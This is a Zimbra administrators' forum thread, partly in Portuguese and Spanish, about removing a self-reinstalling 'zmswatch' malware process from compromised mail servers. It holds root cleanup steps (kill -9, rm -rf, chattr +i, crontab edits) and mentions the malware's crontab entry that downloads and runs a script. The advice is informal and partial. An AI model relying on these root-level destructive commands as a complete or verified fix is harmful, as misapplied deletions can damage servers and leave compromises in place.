Zimbra AJAX Webmail not loading

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 6:30 pm

Ola, tive o mesmo problema a correção foi para o serviço do zimbra ver o que esta em execução no top -u zimbra, feito isso finalizar os processos pendentes, depois verificar as permissões dos arquivos com o comando
/opt/zimbra/libexec/zmfixperms -extended

excluir os executáveis
zmswatch.sh e kthrotlds
refazer a crontab do zimbra


willian.barker
Posts: 5
Joined: Thu Dec 21, 2017 1:59 pm

Re: Zimbra AJAX Webmail not loading

Postby willian.barker » Tue May 28, 2019 6:45 pm

I meant to say it worked out for now. Until I find the correct way to fix the problem.

Do you have any method for me?
The process zmswatch using very high CPU.

Thank you.
MaySky
Posts: 25
Joined: Sat Apr 02, 2016 6:57 am

Re: Zimbra AJAX Webmail not loading

Postby MaySky » Tue May 28, 2019 6:52 pm

koval1986 wrote:Who managed to overcome ZMWATCH completely without return. I have 4 hours and everything comes back! :( :( :( :(


I am. 22 hours without virus already.
Found new intrusion attempts in logs, but all the files in jetty folder are as on newly installed system disconnected from internet and no strange activity in top.
tmp and log folder is ok also.
Reverted back standard cron tasks as per instruction https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
Cron file is untouched from that time also.
Last edited by MaySky on Tue May 28, 2019 7:07 pm, edited 1 time in total.
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:04 pm

Ola
olha só finaliza o processo zmswatch localiza o zmswatch.sh e deleta ele, bloqueia o ip tmb.

willian.barker wrote:I meant to say it worked out for now. Until I find the correct way to fix the problem.

Do you have any method for me?
The process zmswatch using very high CPU.

Thank you.
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:09 pm

Se você nao localizar o executável e vai voltar a alterar o crontab e deletar os paramentros do zimbra.

MaySky wrote:
koval1986 wrote:Who managed to overcome ZMWATCH completely without return. I have 4 hours and everything comes back! :( :( :( :(


I am. 22 hours without virus already.
Found new intrusion attempts in logs, but all the files in jetty folder are as on newly installed system disconnected from internet and no strange activity in top.
tmp and log folder is ok also.
Reverted back standard cron tasks as per instruction https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
Cron file is untouched from that time also.
zimbraargentina
Posts: 5
Joined: Mon May 27, 2019 1:49 pm

Re: Zimbra AJAX Webmail not loading

Postby zimbraargentina » Tue May 28, 2019 7:20 pm

The final solution for remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line if exists that call zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must be goes down in five minutes.

Thanks
Marcos
SDA Argentina
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:21 pm

Ola amigo, mesmo fazendo isso tem algo que fica tentando alterar o crontab o que fiz foi tirar também a permissão de edição do arquivo crontab pois quando ele aterar deleta tudo que tem la e adiciona um comando que baixa e executa outro sh
zimbraargentina wrote:The final solution for remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line if exists that call zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must be goes down in five minutes.

Thanks
Marcos
SDA Argentina
MaySky
Posts: 25
Joined: Sat Apr 02, 2016 6:57 am

Re: Zimbra AJAX Webmail not loading

Postby MaySky » Tue May 28, 2019 7:23 pm

zimbraargentina wrote:The final solution for remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line if exists that call zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must be goes down in five minutes.

Thanks
Marcos
SDA Argentina


This will remove active virus but you should fix/remove all the files in jetty folder, that were compromised as the attack vector will remain even if you'll patch with the latest patch.
zimbraargentina
Posts: 5
Joined: Mon May 27, 2019 1:49 pm

Re: Zimbra AJAX Webmail not loading

Postby zimbraargentina » Tue May 28, 2019 7:29 pm

Of Course

MaySky wrote:
zimbraargentina wrote:The final solution for remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line if exists that call zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must be goes down in five minutes.

Thanks
Marcos
SDA Argentina


This will remove active virus but you should fix/remove all the files in jetty folder, that were compromised as the attack vector will remain even if you'll patch with the latest patch.
jme1924
Posts: 3
Joined: Sat May 25, 2019 8:33 pm

Re: Zimbra AJAX Webmail not loading

Postby jme1924 » Tue May 28, 2019 9:13 pm

Hola a todos.

Una consulta, cuando indican borrar todas los archivos de la carpeta jetty, esto son los que se encuentran en el primer nivel de la carpeta o hay que borrar el contenido completo con subdirectorios también.

Gracias...

Return to “Administrators”

Who is online

Users browsing this forum: Google [Bot] and 18 guests